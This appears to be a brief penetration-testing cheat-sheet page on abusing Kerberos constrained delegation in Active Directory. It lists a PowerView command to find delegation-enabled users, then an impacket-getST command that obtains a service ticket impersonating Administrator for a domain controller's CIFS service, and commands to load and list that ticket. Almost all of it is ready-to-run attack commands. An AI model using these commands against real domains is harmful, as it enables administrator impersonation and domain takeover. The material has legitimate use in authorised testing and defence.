Constrained Delegation Attack
Investigation
Check if Kerberos Constrained Delegation Enabled for User
Get-NetUser -TrustedToAuthExploit
1. Request Service Ticket for Another User
# -k: Use Kerberos Auth
impacket-getST -k -impersonate Administrator -spn cifs/dc.example.local example.local/UserName2. Use the Service Ticket
export KRB5CCNAME=`pwd`/Administrator.ccache
# Check by listing tickets.
# If the klist command not found, install it by `apt install krb5-user`
klistLast updated